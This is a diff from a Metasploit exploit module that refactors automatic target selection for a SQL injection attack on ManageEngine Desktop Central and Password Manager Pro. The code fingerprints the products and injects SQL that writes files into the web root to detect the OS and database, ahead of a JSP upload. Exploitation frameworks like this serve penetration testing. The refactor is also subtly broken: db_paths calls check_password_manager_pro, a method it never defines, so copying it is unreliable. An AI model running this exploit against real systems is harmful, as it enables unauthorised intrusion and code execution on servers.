Refactor pick_target

Author: jvazquez-r7

modules/exploits/multi/http/manageengine_dc_pmp_sqli.rb

@@ -147,7 +147,7 @@ def exploit
 
     # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
     # Fail if this is the case to avoid polluting the web root any more.
-    if @my_target['Platform'] == 'linux' and payload_instance.name =~ /windows/i
+    if @my_target['Platform'] == 'linux' && payload_instance.name =~ /windows/i
       fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
     end
 
@@ -164,63 +164,75 @@ def exploit
     inject_exec(jsp_name, fullpath)
   end
 
-  def pick_target
-    return target if target.name != 'Automatic'
-
-    print_status("#{peer} - Selecting target, this might take a few seconds...")
-    rand_txt = rand_text_alpha_lower(8) << ".txt"
+  # Test for Password Manager Pro
+  def password_manager_paths
+    db_paths = {}
 
-    # Test for Desktop Central
     res = send_request_cgi({
-      'uri' => normalize_uri("configurations.do"),
-      'method' => 'GET'
-    })
+                               'uri' => normalize_uri("PassTrixMain.cc"),
+                               'method' => 'GET'
+                           })
 
-    if res and res.code == 200 and res.body.to_s =~ /ManageEngine Desktop Central/
+    if res && res.code == 200 && res.body.to_s =~ /ManageEngine Password Manager Pro/
       if datastore['WEB_ROOT']
-        postgresql_path = datastore['WEB_ROOT'].dup
-        mysql_path = datastore['WEB_ROOT'].dup
-      elsif res.body.to_s =~ /ManageEngine Desktop Central MSP/
-        postgresql_path = targets[2]['WebRoot'].dup
-        mysql_path = targets[3]['WebRoot'].dup
+        db_paths[:postgresql] = datastore['WEB_ROOT'].dup
+        db_paths[:mysql] = datastore['WEB_ROOT'].dup
       else
-        postgresql_path = targets[1]['WebRoot'].dup
-        mysql_path = targets[3]['WebRoot'].dup
+        db_paths[:postgresql] = targets[4]['WebRoot'].dup
+        db_paths[:mysql] = targets[5]['WebRoot'].dup
       end
-    else
-      # Test for Password Manager Pro
-      res = send_request_cgi({
-        'uri' => normalize_uri("PassTrixMain.cc"),
-        'method' => 'GET'
-      })
-
-      if res and res.code == 200 and res.body.to_s =~ /ManageEngine Password Manager Pro/
-        if datastore['WEB_ROOT']
-          postgresql_path = datastore['WEB_ROOT'].dup
-          mysql_path = datastore['WEB_ROOT'].dup
-        else
-          postgresql_path = targets[4]['WebRoot'].dup
-          mysql_path = targets[5]['WebRoot'].dup
-        end
+    end
+
+    db_paths
+  end
+
+  # Test for Desktop Central
+  def desktop_central_db_paths
+    db_paths = {}
+    res = send_request_cgi({
+                               'uri' => normalize_uri("configurations.do"),
+                               'method' => 'GET'
+                           })
+
+    if res && res.code == 200 && res.body.to_s =~ /ManageEngine Desktop Central/
+      if datastore['WEB_ROOT']
+        db_paths[:postgresql] = datastore['WEB_ROOT'].dup
+        db_paths[:mysql] = datastore['WEB_ROOT'].dup
+      elsif res.body.to_s =~ /ManageEngine Desktop Central MSP/
+        db_paths[:postgresql] = targets[2]['WebRoot'].dup
+        db_paths[:mysql] = targets[3]['WebRoot'].dup
       else
-        # We don't know what this is, bail
-        return nil
+        db_paths[:postgresql] = targets[1]['WebRoot'].dup
+        db_paths[:mysql] = targets[3]['WebRoot'].dup
       end
     end
 
-    # try MySQL first, there are probably more of these out there
-    filepath = mysql_path << rand_txt
+    db_paths
+  end
+
+  def db_paths
+    paths = desktop_central_db_paths
+
+    if paths.empty?
+      paths = check_password_manager_pro
+    end
+
+    paths
+  end
+
+  def pick_mysql_target(mysql_path, rand_txt)
+    file_path = mysql_path << rand_txt
 
     # @@version_compile_os will give us Win32 / Win64 if it's a Windows target
-    inject_sql("select @@version_compile_os into dumpfile '#{filepath}'", "mysql")
+    inject_sql("select @@version_compile_os into dumpfile '#{file_path}'", "mysql")
 
     res = send_request_cgi({
-      'uri' => normalize_uri(rand_txt),
-      'method' => 'GET'
-    })
+                               'uri' => normalize_uri(rand_txt),
+                               'method' => 'GET'
+                           })
 
-    if res and res.code == 200
-      register_file_for_cleanup(filepath.sub('../',''))
+    if res && res.code == 200
+      register_file_for_cleanup(file_path.sub('../',''))
       if res.body.to_s =~ /Win32/ or res.body.to_s =~ /Win64/
         if mysql_path =~ /DesktopCentral/
           # Desktop Central [MSP] / MySQL / Windows
@@ -235,19 +247,22 @@ def pick_target
       end
     end
 
-    # didn't work, let's try PostgreSQL
-    filepath = postgresql_path << rand_txt
+    nil
+  end
+
+  def pick_postgres_target(postgresql_path, rand_txt)
+    file_path = postgresql_path << rand_txt
 
     # version() will tell us if it's compiled by Visual C++ (Windows) or gcc (Linux)
-    inject_sql("copy (select version()) to '#{filepath}'", "postgresql")
+    inject_sql("copy (select version()) to '#{file_path}'", "postgresql")
 
     res = send_request_cgi({
-      'uri' => normalize_uri(rand_txt),
-      'method' => 'GET'
-    })
+                               'uri' => normalize_uri(rand_txt),
+                               'method' => 'GET'
+                           })
 
-    if res and res.code == 200
-      register_file_for_cleanup(filepath)
+    if res && res.code == 200
+      register_file_for_cleanup(file_path)
       if res.body.to_s =~ /Visual C++/
         if postgresql_path =~ /DesktopCentral_Server/
           # Desktop Central / PostgreSQL / Windows
@@ -260,28 +275,57 @@ def pick_target
           return targets[4]
         end
       elsif res.body.to_s =~ /linux/
-         # This is for the case when WEB_ROOT is provided
-         # Password Manager Pro / PostgreSQL / Linux
-         return targets[6]
-      end
-    else
-      # OK, it's Password Manager Pro on Linux, probably using PostgreSQL and
-      # no WEB_ROOT was provided. Let's try one of the defaults before bailing out.
-      filepath = targets[5]['WebRoot'].dup << rand_txt
-      inject_sql("copy (select version()) to '#{filepath}'", "postgresql")
-
-      res = send_request_cgi({
-        'uri' => normalize_uri(rand_txt),
-        'method' => 'GET'
-      })
-
-      if res and res.code == 200 and res.body.to_s =~ /linux/
+        # This is for the case when WEB_ROOT is provided
         # Password Manager Pro / PostgreSQL / Linux
         return targets[6]
-      else
-        return nil
       end
     end
+
+    # OK, it's Password Manager Pro on Linux, probably using PostgreSQL and
+    # no WEB_ROOT was provided. Let's try one of the defaults before bailing out.
+    file_path = targets[5]['WebRoot'].dup << rand_txt
+    inject_sql("copy (select version()) to '#{file_path}'", "postgresql")
+
+    res = send_request_cgi({
+                               'uri' => normalize_uri(rand_txt),
+                               'method' => 'GET'
+                           })
+
+    if res && res.code == 200 && res.body.to_s =~ /linux/
+      # Password Manager Pro / PostgreSQL / Linux
+      return targets[6]
+    end
+
+    nil
+  end
+
+  def pick_target
+    return target if target.name != 'Automatic'
+
+    print_status("#{peer} - Selecting target, this might take a few seconds...")
+    rand_txt = rand_text_alpha_lower(8) << ".txt"
+
+    paths = db_paths
+
+    if paths.empty?
+      # We don't know what this is, bail
+      return nil
+    end
+
+    postgresql_path = paths[:postgresql]
+    mysql_path = paths[:mysql]
+
+    # try MySQL first, there are probably more of these out there
+    mysql_target = pick_mysql_target(mysql_path, rand_txt)
+
+    unless mysql_target.nil?
+      return mysql_target
+    end
+
+    # didn't work, let's try PostgreSQL
+    postgresql_target = pick_postgres_target(postgresql_path, rand_txt)
+
+    postgresql_target
   end
 
   #